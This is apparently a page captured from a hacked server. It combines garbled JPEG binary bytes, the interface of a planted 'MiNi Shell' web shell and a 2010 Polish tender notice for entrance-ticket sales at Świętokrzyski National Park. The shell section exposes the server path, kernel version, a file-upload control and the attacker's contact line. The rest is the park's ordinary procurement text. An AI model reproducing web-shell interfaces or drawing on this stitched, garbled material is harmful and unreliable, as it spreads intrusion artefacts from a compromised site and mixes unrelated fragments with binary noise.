JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100225/52636-N-2010.html

<p class="kh_header"><b>Bodzentyn: Prowadzenie sprzedaży biletów wstępu do Świętokrzyskiego Parku Narodowego w okresie od 01.04.2010 roku do 31.10.2010 roku</b><br>
<b>Numer ogłoszenia: 52636 - 2010; data zamieszczenia: 25.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gospodarstwo Pomocnicze przy ŚPN , ul. Suchedniowska 4, 26-010 Bodzentyn, woj. świętokrzyskie, tel. 0-41 3115106, faks 0-41 3115106.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.swietokrzyskipn.org.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> bip.swietokrzyskipn.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Park Narodowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie sprzedaży biletów wstępu do Świętokrzyskiego Parku Narodowego w okresie od 01.04.2010 roku do 31.10.2010 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprzedaż biletów wstępu do ŚPN za wynagrodzeniem w okresie   rozliczeniowym : 
od 1 kwietnia 2010 do 31 października 2010 roku, z zachowaniem następujących zasad:

1. Sprzedaż biletów wstępu winna odbywać się  w następujących punktach sprzedaży:
a) wejście na galerię widokową na Gołoborze na Łysej Górze;
b) wejście na Św. Krzyż od strony Nowej Słupi; 
c) wejście na Łysicę od strony Św. Katarzyny.
Szczegółowa lokalizacja punktów sprzedaży musi być uzgodniona z Dyrekcją ŚPN.
Wykonawca może  prowadzić sprzedaż biletów wstępu  w innych niż wskazane wyżej  punktach po uprzednim pisemnym uzgodnieniu lokalizacji tych punktów z Dyrekcją ŚPN.

2. Sprzedaż biletów wstępu prowadzona będzie przez 7 dni w tygodniu  w okresie:
a) od 1 kwietnia do 28 kwietnia 2010 roku:
wejście na galerię widokową na Gołoborze na Łysej Górze w godzinach od 900 do 1700;
wejście na Św. Krzyż od strony Nowej Słupi w godzinach od 900 do 1700;
wejście na Łysicę od strony Św. Katarzyny w godzinach od 900 do 1700.
b) od 29 kwietnia do 30 września 2010 roku:
wejście na galerię widokową na Gołoborze na Łysej Górze w godzinach od 900 do 1900;
wejście na Św. Krzyż od strony Nowej Słupi w godzinach od 900 do 1700;
wejście na Łysicę od strony Św. Katarzyny w godzinach od 900 do 1700.
c) od 1 do 31 października 2010 roku:
wejście na galerię widokową na Gołoborze na Łysej Górze w godzinach od 900 do 1700;
wejście na Św. Krzyż od strony Nowej Słupi w godzinach od 900 do 1700;
wejście na Łysicę od strony Św. Katarzyny w godzinach od 900 do 1700.
W innych niż wskazane wyżej   stosownie do możliwości  Wykonawcy. 
3. Ponumerowane bilety wstępu do sprzedaży Wykonawca pobierać będzie w Dyrekcji Świętokrzyskiego Parku Narodowego partiami.  Przekazywane Wykonawcy bilety wstępu traktowane będą jako druki ścisłego zarachowania. W razie utraty pobranych  biletów wstępu lub stwierdzenia  niedoboru przy ich  rozliczaniu Wykonawca zostanie obciążony przez Zamawiającego nominalną  ich wartością.
4. Na poczet zabezpieczenia rozliczeń z pobranych  biletów  Wykonawca uiszcza kaucję w kwocie 10.000 złotych w dniu podpisania umowy. Kaucja jest przechowywana na rachunku Zamawiającego i podlega zwrotowi nie później niż 7 dni  po zakończeniu okresu rozliczeniowego.
5. Nominalna wartość pobieranych biletów wstępu i nie rozliczonych biletów z  pobranych poprzednio partii nie może przekraczać  kwoty kaucji .
6. W przypadku  utraty  pobranych biletów  wstępu lub stwierdzenia ich niedoboru przy rozliczeniu Zamawiający jest uprawniony do dokonania potrącenia ich równowartości  liczonej według cen nominalnych biletów  z kaucji.
7. Wykonawca może sprzedawać jedynie ponumerowane bilety wstępu pobrane w Dyrekcji ŚPN i po cenie  ustalonej przez Dyrektora ŚPN.
8. Wykonawca rozliczać się będzie z pobranych  biletów wstępu w okresach tygodniowych, odprowadzając kwoty pobrane za sprzedane biletów wstępu do kasy Zamawiającego. Zamawiający po dokonaniu przez Wykonawcę wpłaty za sprzedane bilety wstępu wystawi Wykonawcy fakturę VAT potwierdzającą faktyczną sprzedaż biletów. Na poczet należności z faktury VAT Zamawiający zaliczy kwotę wpłaconą do kasy Zamawiającego z tytułu sprzedanych biletów. Wykonawca wystawi fakturę ( rachunek ) na prowizję należną od sprzedanych biletów.  
a) W terminie do 15 listopada 2010 roku strony dokonają końcowego rozliczenia. W tej dacie Wykonawca będzie zobowiązany do zwrotu pobranych i nie sprzedanych  biletów wstępu.
b) Wykonawca będzie sprzedawał bilety wstępu w poszczególnych punktach sprzedaży zgodnie z ustawą o podatku VAT a w przypadku obowiązku ewidencjonowania obrotów  za pomocą kas rejestrujących do ich posiadania.
c) Wykonawca jest zobowiązany wystawić rachunek lub fakturę VAT za bilety wstępu na wniosek kupującego.
9. Wykonawca w poszczególnych punktach sprzedaży jest zobowiązany do prowadzenia dziennych rozliczeń, zawierających liczbę sprzedanych biletów wstępu wraz z podaniem numeracji sprzedanych  biletów wstępu  systemem od nr. do nr.
10. Celem prowadzenia przez ŚPN analizy ruchu turystycznego, Wykonawca przekaże  Zamawiającemu w terminie do 30 listopada 2010 roku zestawienie dziennych rozliczeń sprzedaży biletów wstępu z poszczególnych punktów sprzedaży.
11. Prowadząc sprzedaż biletów wstępu Wykonawca przestrzegać będzie:
a) art.12 ust. Ustawy z dnia 16 kwietnia 2004 roku o ochronie przyrody (j.t.Dz. U. z 2009r.nr151, poz.1220 z późn. zm.);
b) rozporządzenia Ministra Środowiska z dnia 18 maja 2005 roku w sprawie parków narodowych lub niektórych ich obszarów, gdzie za wstęp pobiera się opłaty (Dz. U. nr 91 poz.765);
c) zarządzenia nr. 9-2006 Dyrektora ŚPN z dnia 27 marca 2006 roku, znak KD-011-9-06  w sprawie opłat za wstęp na niektóre obszary ŚPN.
12. Ceny biletów wstępu  mają charakter ceny sztywnej w rozumieniu art. 537 par 1 k.c. i  wynikają z zarządzenia  Dyrektora SPN. 
Na dzień  zawarcia umowy  ceny wynoszą:
a) normalny 5,00 zł;
b) ulgowy    2,50 zł;
c) tygodniowy normalny 10,00 zł;
d) tygodniowy ulgowy 5,00 zł.
13. Wykonawca oznaczy punkty   sprzedaży biletów wstępu do ŚPN tablicami informacyjnymi (mogą być to tablice przenośne)  zawierająca  informację  zgodnie z pkt.11 oraz napisem - Sprzedaż biletów wstępu na szlak czerwony Św. Katarzyna -Trzcianka i niebieski Nowa Słupia - Św. Krzyż w Świętokrzyskim Parku  Narodowym .
14. Zatrudnionych przez Wykonawcę sprzedawców biletów wstępu obowiązuje schludny i jednolity ubiór koloru khaki o kroju mundurowym lub strój ludowy, świętokrzyski oraz właściwe zachowanie wobec turystów zwiedzających  SPN.
15. Zamawiający  zastrzega sobie prawo do sprzedaży biletów wstępu  w  Dyrekcji ŚPN oraz w Muzeum Przyrodniczym ŚPN na Św. Krzyżu.
16. Wykonawca wybrany w przetargu nie ma prawa łączyć sprzedaży biletów wstępu z inną działalnością gospodarczą w miejscu sprzedaży biletów wstępu, prócz ewentualnej sprzedaży drukowanych materiałów informacyjnych, dydaktycznych, map oraz przewodników.
17. Opóźnienie w rozliczeniach za pobrane bilety przekraczające 7 dni oraz nie dotrzymanie warunków umowy w zakresie punktów i godzin  sprzedaży, jak również dokonywanie sprzedaży biletów   w innej cenie niż określona w pkt. 11  będzie  stanowiło  podstawą do natychmiastowego rozwiązania umowy .
18.Umowa może być wypowiedziana przez Wykonawcę w okresie na jaki została zawarta..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.51.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca winien wnieść wadium przetargowe w wysokości 1 900 zł. wartości  zamówienia, najpóźniej do 9 marca 2010 roku.
2. Wadium może być wnoszone  w  następujących formach : 
- pieniądzu
- poręczeniach bankowych
- gwarancjach bankowych
- gwarancjach ubezpieczeniowych 
- poręczeniach udzielanych przez podmioty wskazane w art. 45 ust.6 pkt 5 ustawy PZP  
3. Wadium  uiszczane w pieniądzu należy wpłacić przelewem na rachunek Gospodarstwa Pomocniczego przy Świętokrzyskim Parku Narodowym w Kredyt Banku S.A. O Kielce nr 85 1500 1458 1214 5001 4390 0000.  
4. Wadium  podlega zwrotowi w przypadkach i na zasadach wskazanych w art.  46 ust.1  ust.2 ustawy PZP     
5. Zamawiający zatrzymuje wadium  w przypadkach i na zasadach  wskazanych  w art.  46  ust. 4a, ust. 5 ustawy PZP.
6. Wadium Wykonawcy, którego oferta zostanie wybrana może być na jego wniosek zaliczone na poczet  kaucji  zgodnie z postanowieniami umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.swietokrzyskipn.org.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyski Park Narodowy
26-010 Bodzentyn, ul. Suchedniowska 4
tel./faks 41 311 51 06 w. 50 lub 51
pokój 102 lub 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2010 godzina 13:30, miejsce: Świętokrzyski Park Narodowy
26-010 Bodzentyn, ul. Suchedniowska 4
pokój 11 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 31.10.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com